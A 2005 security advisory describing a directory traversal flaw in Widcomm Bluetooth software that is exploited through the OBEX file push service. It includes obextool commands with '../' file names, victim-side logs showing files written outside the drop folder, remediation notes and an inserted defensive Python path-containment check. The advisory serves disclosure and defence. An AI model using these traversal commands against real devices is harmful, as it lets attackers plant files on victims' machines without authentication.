DMA[2005-0412a] - 'Widcomm BTW (Microsoft Windows BT stack) Directory Traversal'

Author: Kevin Finisterre
Vendor: http://66.45.42.84/Products, http://www.broadcom.com/press/release.php?id=525262
Product: 'versions older than BTW 3.0.1.905 ?'
References: http://www.digitalmunition.com/DMA[2005-0412a].txt

Description:

On August 11 2004, in Advisory Reference ptl-2004-03, Pentest Limited released very minimal detail on security issues related to 'WIDCOMM Bluetooth Connectivity Software'. CAN-2004-0775 (http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0775) was created in order to provide information surrounding this issue. Unfortunately none of the links provided by the CVE entry contain any real data on the attacks. In efforts to document and exploit the above mentioned issues I stumbled upon yet another problem.

WIDCOMM Inc., which is short for Wireless Internet and Data/Voice Communications, previously designed products for indoor wireless communications. Founded in June 1998, the company was focused on Bluetooth networking. WIDCOMM's goal was to make it secure, easy, and inexpensive for people with PCs, cellular phones, PDAs and laptops to wirelessly link their devices and to access the Internet. On May 10 2004 Broadcom Corporation, a leading provider of highly integrated semiconductor solutions enabling broadband communications, announced that it had completed the acquisition of WIDCOMM.

I happen to own Bluetooth dongles from Belkin, Actiontec, Linksys, Ambicom, D-Link and Zoom, and only one of them came with BlueSoleil instead of Widcomm based software. I would guess that somewhere around 90% of the PC Bluetooth hardware on the market currently comes with Widcomm install media. The dongle that I used for testing was an Ambicom BT2000C-US on Windows XP SP2. The software that was bundled with the dongle was a variant of Widcomm's Bluetooth Software version 1.4.2.
Several other revisions are available, however due to problems with licensing you may find it difficult to make use of anything that did not specifically come packaged with your device. I even ran into an instance in which my purchased dongle did not even work with the software it was bundled with (Thanks D-Link!). Several sites document the difficulties that the end user is faced with when trying to use the various versions of the Widcomm software. Short of stating that Widcomm and Broadcom have really done a huge disservice to their end users, I will not go into the fiasco surrounding license.dat issues. Fixing and/or patching the vulnerabilities I am going to mention may be compounded by the fact that Widcomm and Broadcom's customer base is simply unable to upgrade. Widcomm has in essence shot us all in the foot.

After an install of the Widcomm software you are presented with the 'Initial Bluetooth Configuration' screen. Here you choose the name of your device and select the Bluetooth services it will provide. By default 'PIM Item Transfer' is set to start automatically with no authentication required. Under normal circumstances files are dropped into "\Bluetooth Exchange Folder". Any device that attempts to transfer files to or from your device should be limited to accessing this folder. Unfortunately this is NOT the case: a simple ../ is enough to cause a little trouble. This attack can have its limitations depending on how the software settings are configured.

Using a modified obextool binary from ussp-push we can easily demonstrate the problem. As stated above, a normal transaction should limit files to the "\Bluetooth Exchange Folder":

    animosity:~/ussp-push-0.2# ./obextool push /etc/hosts 00:0C:41:E2:7A:EE testfile 3
    Sending object ...

BtserverSpylite output:

    00:32:17.995 OPP: Settings for saving objects...
    00:32:18.015 vCard's: 'Save to PIM'
    00:32:18.035 vCal's: 'Do not accept'
    00:32:18.055 vMsg's: 'Do not accept'
    00:32:18.075 vNote's: 'Do not accept'
    00:32:18.095 Other: 'Save to Inbox folder'
    00:32:18.115 Folder: 'C:\Documents and Settings\Administrator\My Documents\Bluetooth Exchange Folder\'
    00:32:18.135 OPP: File did not contain an object. Save to Inbox as 'other' type.
    00:32:18.155 OPP: 'testfile' saved to PIM Item Transfer Folder '...My Documents\Bluetooth Exchange Folder'

    C:\Documents and Settings\Administrator\My Documents\Bluetooth Exchange Folder>dir
     Volume in drive C has no label.
     Volume Serial Number is F888-ED9A

     Directory of C:\Documents and Settings\Administrator\My Documents\Bluetooth Exchange Folder

    07/12/2005  12:32 AM    <DIR>          .
    07/12/2005  12:32 AM    <DIR>          ..
    07/12/2005  12:32 AM               262 testfile
                   1 File(s)            262 bytes
                   2 Dir(s)  35,701,919,744 bytes free

We are however able to travel beyond the Bluetooth Exchange Folder by adding "../" to our request. Under the default configuration this allows us to write to the root of the My Documents folder.

    animosity:~/ussp-push-0.2# ./obextool push /etc/hosts 00:0C:41:E2:7A:EE ../Im_rick_james 3
    Sending object ...

    00:35:19.897 OPP: '../Im_rick_james' saved to PIM Item Transfer Folder '...\My Documents\Bluetooth Exchange Folder'

    C:\Documents and Settings\Administrator\My Documents>dir
     Volume in drive C has no label.
     Volume Serial Number is F888-ED9A

     Directory of C:\Documents and Settings\Administrator\My Documents

    07/12/2005  12:35 AM    <DIR>          .
    07/12/2005  12:35 AM    <DIR>          ..
    07/12/2005  12:35 AM               262 Im_rick_james
    07/01/2005  08:38 PM    <DIR>          Bluetooth
    07/12/2005  12:32 AM    <DIR>          Bluetooth Exchange Folder
    07/01/2005  04:38 PM    <DIR>          My Music
    06/25/2005  02:55 PM    <DIR>          My Pictures
    06/27/2005  12:08 AM    <DIR>          My Virtual Machines
                   1 File(s)            262 bytes
                   7 Dir(s)  35,701,919,744 bytes free

Due to an unknown reason, when using the default configuration you are only able to go up one directory. Because of this you are limited to being able to write to the My Documents folder ONLY.
This could be an XP SP2 thing. I have NOT tested this on Windows 9x based software at all. In other words your results may vary.

    animosity:~/ussp-push-0.2# ./obextool push /etc/hosts 00:0C:41:E2:7A:EE ../../beiotch 3
    Sending object ...

    00:37:25.457 OPP: Error - Could not rename 'C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\../../beiotch' to 'C:\Documents and Settings\Administrator\My Documents\Bluetooth Exchange Folder\../../beiotch'

If you change the default drop directory from "\Bluetooth Exchange Folder" to something else we are able to traverse a good portion of the file system. In this example we used C:\test\test2\test3\test4 as our Bluetooth drop folder.

    00:57:38.471 OPP: Settings for saving objects...
    00:57:38.481 vCard's: 'Save to PIM'
    00:57:38.501 vCal's: 'Do not accept'
    00:57:38.511 vMsg's: 'Do not accept'
    00:57:38.532 vNote's: 'Do not accept'
    00:57:38.542 Other: 'Save to Inbox folder'
    00:57:38.562 Folder: 'C:\test\test2\test3\test4'
    00:57:38.582 OPP: File did not contain an object. Save to Inbox as 'other' type.
    00:57:38.602 OPP: '../blah' saved to PIM Item Transfer Folder 'C:\test\test2\test3\test4'
    00:57:38.672 GKI freeq 0 (2:4) 1 (0:1) 2 (0:0) 3 (1:12) 4 (0:46)

    00:57:57.599 OPP: Settings for saving objects...
    00:57:57.609 vCard's: 'Save to PIM'
    00:57:57.629 vCal's: 'Do not accept'
    00:57:57.649 vMsg's: 'Do not accept'
    00:57:57.669 vNote's: 'Do not accept'
    00:57:57.679 Other: 'Save to Inbox folder'
    00:57:57.699 Folder: 'C:\test\test2\test3\test4'
    00:57:57.719 OPP: File did not contain an object. Save to Inbox as 'other' type.
    00:57:57.739 OPP: '../../blah' saved to PIM Item Transfer Folder 'C:\test\test2\test3\test4'

    00:58:14.243 OPP: Settings for saving objects...
    00:58:14.263 vCard's: 'Save to PIM'
    00:58:14.283 vCal's: 'Do not accept'
    00:58:14.293 vMsg's: 'Do not accept'
    00:58:14.313 vNote's: 'Do not accept'
    00:58:14.333 Other: 'Save to Inbox folder'
    00:58:14.343 Folder: 'C:\test\test2\test3\test4'
    00:58:14.363 OPP: File did not contain an object. Save to Inbox as 'other' type.
    00:58:14.383 OPP: '../../../blah' saved to PIM Item Transfer Folder 'C:\test\test2\test3\test4'

Again, for some reason we run into a minor limitation on where the files can be dropped.

    00:58:29.735 OPP: Settings for saving objects...
    00:58:29.755 vCard's: 'Save to PIM'
    00:58:29.775 vCal's: 'Do not accept'
    00:58:29.795 vMsg's: 'Do not accept'
    00:58:29.815 vNote's: 'Do not accept'
    00:58:29.835 Other: 'Save to Inbox folder'
    00:58:29.855 Folder: 'C:\test\test2\test3\test4'
    00:58:29.875 OPP: File did not contain an object. Save to Inbox as 'other' type.
    00:58:29.895 OPP: Error - Could not rename 'C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\../../../../blah' to 'C:\test\test2\test3\test4\../../../../blah'

As you can see, the Bluetooth drop directory can easily be ignored by the attacker.

    C:\>dir test\blah test\test2\blah test\test2\test3\blah
     Volume in drive C has no label.
     Volume Serial Number is F888-ED9A

     Directory of C:\test

    07/12/2005  12:58 AM               262 blah
                   1 File(s)            262 bytes

     Directory of C:\test\test2

    07/12/2005  12:57 AM               262 blah
                   1 File(s)            262 bytes

     Directory of C:\test\test2\test3

    07/12/2005  12:57 AM               262 blah
                   1 File(s)            262 bytes

I have not seen this issue documented anywhere. It was not described in the release by pentest.co.uk, nor was it mentioned in any advisory from Widcomm or Broadcom. I am unable to tell exactly when this issue was introduced into the Widcomm codebase, and I am equally unable to tell exactly when it was fixed. All of the above testing was performed against PC versions of the software; it is currently unknown how other Widcomm platforms are affected by this issue. I have confirmed that versions 4.0.1.700 and 3.0.1.905 are NOT exploitable (for this condition). In these versions the "../" request is replaced with "..x", thus preventing the attack.

Timeline associated with this bug:

04/12/2005 Public disclosure due to the fact that the bug was silently fixed by the vendor(s) in the past.
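A receive-side path check of the kind the fixed versions needed, added here as an example and not code from Widcomm, Broadcom or ussp-push: it uses Python's ntpath so the Windows path rules run on any host, places the advisory's default drop folder and the custom C:\test\test2\test3\test4 folder beside the object names seen in the logs above, and models the reported "../" to "..x" rewrite (how the vendor actually implemented it is an assumption).

```python
import ntpath  # Windows path semantics without needing a Windows host

# Constructed to match the advisory's default drop folder. Assumption: the
# receiving side builds the on-disk path by appending the OBEX object name.
DEFAULT_DROP = r"C:\Documents and Settings\Administrator\My Documents\Bluetooth Exchange Folder"


def naive_save_path(drop_folder, object_name):
    """Vulnerable form: the client-supplied OBEX name is joined to the drop
    folder unchanged, so '../' components climb out of it (the behaviour the
    advisory observed in BTW 1.4.2)."""
    return ntpath.normpath(ntpath.join(drop_folder, object_name))


def vendor_style_name(object_name):
    """Models the fix the advisory reports in 3.0.1.905 / 4.0.1.700: every
    '../' in the object name becomes '..x'. The vendor's real logic is not
    public; this is an assumption based on the advisory's description."""
    return object_name.replace("../", "..x")


def escapes_drop_folder(drop_folder, path):
    """True when `path` resolves outside `drop_folder`. Both sides are
    canonicalised and lower-cased because NTFS lookups ignore case."""
    base = ntpath.normcase(ntpath.normpath(drop_folder))
    target = ntpath.normcase(ntpath.normpath(path))
    try:
        return ntpath.commonpath([base, target]) != base
    except ValueError:  # different drive letters: certainly outside
        return True


def safe_save_path(drop_folder, object_name):
    """Hardened form: keep only the final component of the supplied name,
    refuse empty or dot-only names and alternate data streams (':'), then
    re-check containment after canonicalisation. None means 'refuse'."""
    leaf = ntpath.basename(object_name)  # ntpath splits on both '/' and '\\'
    if leaf in ("", ".", "..") or ":" in leaf:
        return None
    candidate = ntpath.normpath(ntpath.join(drop_folder, leaf))
    if escapes_drop_folder(drop_folder, candidate):
        return None
    return candidate
```

The containment check is the part that matters: string rewriting such as "..x" only blocks the spelling it was written for, whereas comparing the canonical target against the canonical drop folder rejects any name that ends up elsewhere.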
Regurgitated Workaround:

'...(we) recommend that end users stop using the vulnerable WIDCOMM Bluetooth software'. Alternately users can 'set their Bluetooth device configuration to be non-discoverable or hidden.' Please note however 'This will not stop the device from being vulnerable but it may limit the exposure.'

Due to the fact that this issue was patched silently NO attempt was made to notify Broadcom or Widcomm about this issue. The issue appears to have been patched in version 3.x. Unfortunately, due to licensing issues, users of this software will find it difficult to patch this vulnerability, and I found it difficult to research which versions were and were not vulnerable. Bug your vendor to get you some updated software and ask them to quit playing games over license.dat files! Other vendors are affected by similar issues and future advisories will be released.

All your Bluetooth are belong to greenplaque.

-KF